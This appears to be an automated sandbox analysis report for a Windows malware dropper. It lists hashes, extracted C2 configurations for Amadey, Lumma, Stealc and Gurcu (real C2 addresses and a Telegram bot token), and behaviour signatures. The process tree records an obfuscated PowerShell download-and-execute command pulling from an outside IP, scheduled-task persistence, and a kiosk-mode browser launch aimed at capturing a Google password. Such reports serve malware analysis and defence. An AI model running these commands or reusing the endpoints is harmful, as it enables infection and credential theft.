Analysis

  • max time kernel
    145s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-12-2024 16:45

General

  • Target

    d467b9c94ce07d4f539491f5cd2fc7219008cf196eff6a62880095b06c345b75.exe

  • Size

    6.9MB

  • MD5

    08391c46059bd63c5973cc9bc12e08d1

  • SHA1

    0c2ab65b7b5c89e506aa746b3fd33f34b13f6ceb

  • SHA256

    d467b9c94ce07d4f539491f5cd2fc7219008cf196eff6a62880095b06c345b75

  • SHA512

    4a3caa62a4454d82f16766a4d06303db45b4fe95cb0e9c7e780e7cc05da66167fb9547cd20f2a1217f187ee038939cb0585547bb564cbbc95d836ee92cc68624

  • SSDEEP

    196608:w27c3qwaGvoW5hAgIf+lEOeiitZzRsUiDRZWLY:w27c3qFI5hAvf+lEOeiitZlVqR8

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.11.61.104/Z.png

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://sordid-snaked.cyou/api

https://awake-weaves.cyou/api

https://wrathful-jammy.cyou/api

https://debonairnukk.xyz/api

https://diffuculttan.xyz/api

https://effecterectz.xyz/api

https://deafeninggeh.biz/api

https://immureprech.biz/api

https://tacitglibbr.biz/api

https://shineugler.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

cryptbot

Extracted

Family

lumma

C2

https://tacitglibbr.biz/api

https://immureprech.biz/api

https://shineugler.biz/api

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7807236140:AAF-i5R6XuCUIDX7jhwiW3NW21ELWWQOTo0/sendMessag

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Cryptbot family
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Enumerates VirtualBox registry keys 2 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 18 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 36 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 42 IoCs
  • Identifies Wine through registry keys 2 TTPs 18 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 33 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 5 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 16 IoCs
  • Drops file in Windows directory 14 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 39 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 38 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 42 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d467b9c94ce07d4f539491f5cd2fc7219008cf196eff6a62880095b06c345b75.exe
    "C:\Users\Admin\AppData\Local\Temp\d467b9c94ce07d4f539491f5cd2fc7219008cf196eff6a62880095b06c345b75.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4916
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P3z54.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\P3z54.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2960
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x7W52.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x7W52.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4724
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1L26f6.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1L26f6.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:5044
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:224
            • C:\Users\Admin\AppData\Local\Temp\1016180001\p9rUYZq.exe
              "C:\Users\Admin\AppData\Local\Temp\1016180001\p9rUYZq.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:60
              • C:\Users\Admin\AppData\Local\Temp\NordVPNSetup.exe
                "C:\Users\Admin\AppData\Local\Temp\NordVPNSetup.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3536
                • C:\Users\Admin\AppData\Local\Temp\is-O6265.tmp\NordVPNSetup.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-O6265.tmp\NordVPNSetup.tmp" /SL5="$A0278,884989,866304,C:\Users\Admin\AppData\Local\Temp\NordVPNSetup.exe"
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  PID:3968
            • C:\Users\Admin\AppData\Local\Temp\1016190001\83749202c8.exe
              "C:\Users\Admin\AppData\Local\Temp\1016190001\83749202c8.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2044
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" -Command " $L='(New-Object Net.We'; $Y='bClient).Downlo'; $V='adString(''http://185.11.61.104/Z.png'')'; $F=I`E`X ($L,$Y,$V -Join '')|I`E`X"
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                PID:2980
                • C:\Windows\system32\ipconfig.exe
                  "C:\Windows\system32\ipconfig.exe" /flushdns
                  8⤵
                  • Gathers network information
                  PID:3752
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  8⤵
                  • Adds Run key to start application
                  • System Location Discovery: System Language Discovery
                  PID:2124
            • C:\Users\Admin\AppData\Local\Temp\1016191001\47b11fef81.exe
              "C:\Users\Admin\AppData\Local\Temp\1016191001\47b11fef81.exe"
              6⤵
              • Enumerates VirtualBox registry keys
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:924
            • C:\Users\Admin\AppData\Local\Temp\1016192001\LiKzOkV.exe
              "C:\Users\Admin\AppData\Local\Temp\1016192001\LiKzOkV.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2492
            • C:\Users\Admin\AppData\Local\Temp\1016193001\0e8a01896e.exe
              "C:\Users\Admin\AppData\Local\Temp\1016193001\0e8a01896e.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:208
            • C:\Users\Admin\AppData\Local\Temp\1016194001\af5a0e5186.exe
              "C:\Users\Admin\AppData\Local\Temp\1016194001\af5a0e5186.exe"
              6⤵
              • Enumerates VirtualBox registry keys
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2972
            • C:\Users\Admin\AppData\Local\Temp\1016195001\1849e45a8f.exe
              "C:\Users\Admin\AppData\Local\Temp\1016195001\1849e45a8f.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1592
              • C:\Windows\SysWOW64\msiexec.exe
                "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a2074b57f1ad040c\ScreenConnect.ClientSetup.msi"
                7⤵
                • Enumerates connected drives
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:1864
            • C:\Users\Admin\AppData\Local\Temp\1016196001\d98163520e.exe
              "C:\Users\Admin\AppData\Local\Temp\1016196001\d98163520e.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2380
              • C:\Users\Admin\AppData\Local\Temp\R1XJNOANVFVME2LW0Y9F7ATTN2K.exe
                "C:\Users\Admin\AppData\Local\Temp\R1XJNOANVFVME2LW0Y9F7ATTN2K.exe"
                7⤵
                • Modifies Windows Defender Real-time Protection settings
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Windows security modification
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                PID:3372
              • C:\Users\Admin\AppData\Local\Temp\7WAYNA2V01TNCC77HNNQ.exe
                "C:\Users\Admin\AppData\Local\Temp\7WAYNA2V01TNCC77HNNQ.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                PID:3164
            • C:\Users\Admin\AppData\Local\Temp\1016197001\8ebf590dd8.exe
              "C:\Users\Admin\AppData\Local\Temp\1016197001\8ebf590dd8.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              PID:3140
            • C:\Users\Admin\AppData\Local\Temp\1016198001\51d06ec55f.exe
              "C:\Users\Admin\AppData\Local\Temp\1016198001\51d06ec55f.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:3616
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                PID:3396
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                PID:3452
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                PID:2672
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                PID:4576
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                PID:892
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                  PID:2180
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    8⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of SetWindowsHookEx
                    PID:4372
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2024 -parentBuildID 20240401114208 -prefsHandle 1936 -prefMapHandle 1928 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e92e264-f38a-4a86-8add-1d1c5ae858db} 4372 "\\.\pipe\gecko-crash-server-pipe.4372" gpu
                      9⤵
                        PID:4036
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2480 -parentBuildID 20240401114208 -prefsHandle 2464 -prefMapHandle 2460 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c5af028-fed6-4a9b-81f6-f079962d4c44} 4372 "\\.\pipe\gecko-crash-server-pipe.4372" socket
                        9⤵
                          PID:2328
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2960 -childID 1 -isForBrowser -prefsHandle 3220 -prefMapHandle 3236 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1172 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {389a8534-0555-4078-b039-1b14a6888c54} 4372 "\\.\pipe\gecko-crash-server-pipe.4372" tab
                          9⤵
                            PID:3452
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3932 -childID 2 -isForBrowser -prefsHandle 3928 -prefMapHandle 3924 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1172 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e312571b-0256-4923-a5a9-806e237b19ab} 4372 "\\.\pipe\gecko-crash-server-pipe.4372" tab
                            9⤵
                              PID:4936
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4452 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4564 -prefMapHandle 4560 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f151ed2a-d191-43df-a623-6fc5066dd185} 4372 "\\.\pipe\gecko-crash-server-pipe.4372" utility
                              9⤵
                              • Checks processor information in registry
                              PID:6124
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5540 -childID 3 -isForBrowser -prefsHandle 5472 -prefMapHandle 5480 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1172 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7dd16af6-5ffe-4dc9-8c9b-065526af7252} 4372 "\\.\pipe\gecko-crash-server-pipe.4372" tab
                              9⤵
                                PID:5836
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4452 -childID 4 -isForBrowser -prefsHandle 5524 -prefMapHandle 5344 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1172 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7407c413-b983-458d-9d9c-969a98bf109c} 4372 "\\.\pipe\gecko-crash-server-pipe.4372" tab
                                9⤵
                                  PID:5848
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5764 -childID 5 -isForBrowser -prefsHandle 5868 -prefMapHandle 5872 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1172 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c1002cb7-1da1-4b86-a298-f1d247159e7f} 4372 "\\.\pipe\gecko-crash-server-pipe.4372" tab
                                  9⤵
                                    PID:5884
                            • C:\Users\Admin\AppData\Local\Temp\1016199001\c1fe85d747.exe
                              "C:\Users\Admin\AppData\Local\Temp\1016199001\c1fe85d747.exe"
                              6⤵
                              • Modifies Windows Defender Real-time Protection settings
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Windows security modification
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              PID:2516
                            • C:\Users\Admin\AppData\Local\Temp\1016200001\c899a6cee3.exe
                              "C:\Users\Admin\AppData\Local\Temp\1016200001\c899a6cee3.exe"
                              6⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:5352
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                                7⤵
                                  PID:5172
                                  • C:\Windows\system32\mode.com
                                    mode 65,10
                                    8⤵
                                      PID:5132
                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                      7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                      8⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:2208
                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                      7z.exe e extracted/file_7.zip -oextracted
                                      8⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:4692
                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                      7z.exe e extracted/file_6.zip -oextracted
                                      8⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:1592
                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                      7z.exe e extracted/file_5.zip -oextracted
                                      8⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:1836
                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                      7z.exe e extracted/file_4.zip -oextracted
                                      8⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:4524
                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                      7z.exe e extracted/file_3.zip -oextracted
                                      8⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:3660
                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                      7z.exe e extracted/file_2.zip -oextracted
                                      8⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:1072
                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                      7z.exe e extracted/file_1.zip -oextracted
                                      8⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:1896
                                    • C:\Windows\system32\attrib.exe
                                      attrib +H "in.exe"
                                      8⤵
                                      • Views/modifies file attributes
                                      PID:3328
                                    • C:\Users\Admin\AppData\Local\Temp\main\in.exe
                                      "in.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:5444
                                      • C:\Windows\SYSTEM32\attrib.exe
                                        attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                        9⤵
                                        • Views/modifies file attributes
                                        PID:5492
                                      • C:\Windows\SYSTEM32\attrib.exe
                                        attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                        9⤵
                                        • Views/modifies file attributes
                                        PID:5500
                                      • C:\Windows\SYSTEM32\schtasks.exe
                                        schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                        9⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:5532
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell ping 127.0.0.1; del in.exe
                                        9⤵
                                        • System Network Configuration Discovery: Internet Connection Discovery
                                        PID:5568
                                        • C:\Windows\system32\PING.EXE
                                          "C:\Windows\system32\PING.EXE" 127.0.0.1
                                          10⤵
                                          • System Network Configuration Discovery: Internet Connection Discovery
                                          • Runs ping.exe
                                          PID:5840
                            • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2k1905.exe
                              C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2k1905.exe
                              4⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:4080
                              • C:\Users\Admin\AppData\Local\Temp\V0HNIM6ANJB5KSIH2PDT4.exe
                                "C:\Users\Admin\AppData\Local\Temp\V0HNIM6ANJB5KSIH2PDT4.exe"
                                5⤵
                                • Modifies Windows Defender Real-time Protection settings
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Windows security modification
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1608
                              • C:\Users\Admin\AppData\Local\Temp\N8Z9ZA8U7KYHOXGET2.exe
                                "C:\Users\Admin\AppData\Local\Temp\N8Z9ZA8U7KYHOXGET2.exe"
                                5⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2108
                          • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3G94w.exe
                            C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3G94w.exe
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:548
                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4B397a.exe
                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4B397a.exe
                          2⤵
                          • Modifies Windows Defender Real-time Protection settings
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Windows security modification
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3324
                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:860
                      • C:\Windows\system32\msiexec.exe
                        C:\Windows\system32\msiexec.exe /V
                        1⤵
                        • Enumerates connected drives
                        • Boot or Logon Autostart Execution: Authentication Package
                        • Drops file in Program Files directory
                        • Drops file in Windows directory
                        • Modifies data under HKEY_USERS
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4704
                        • C:\Windows\syswow64\MsiExec.exe
                          C:\Windows\syswow64\MsiExec.exe -Embedding 886C4F4E43FABA6BB63ED2AE3796433F C
                          2⤵
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of WriteProcessMemory
                          PID:2872
                          • C:\Windows\SysWOW64\rundll32.exe
                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI3B5E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240663453 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                            3⤵
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:1836
                        • C:\Windows\system32\srtasks.exe
                          C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                          2⤵
                            PID:6088
                          • C:\Windows\syswow64\MsiExec.exe
                            C:\Windows\syswow64\MsiExec.exe -Embedding 61B748E57C379F9C8DB1700B7515E232
                            2⤵
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:6240
                          • C:\Windows\syswow64\MsiExec.exe
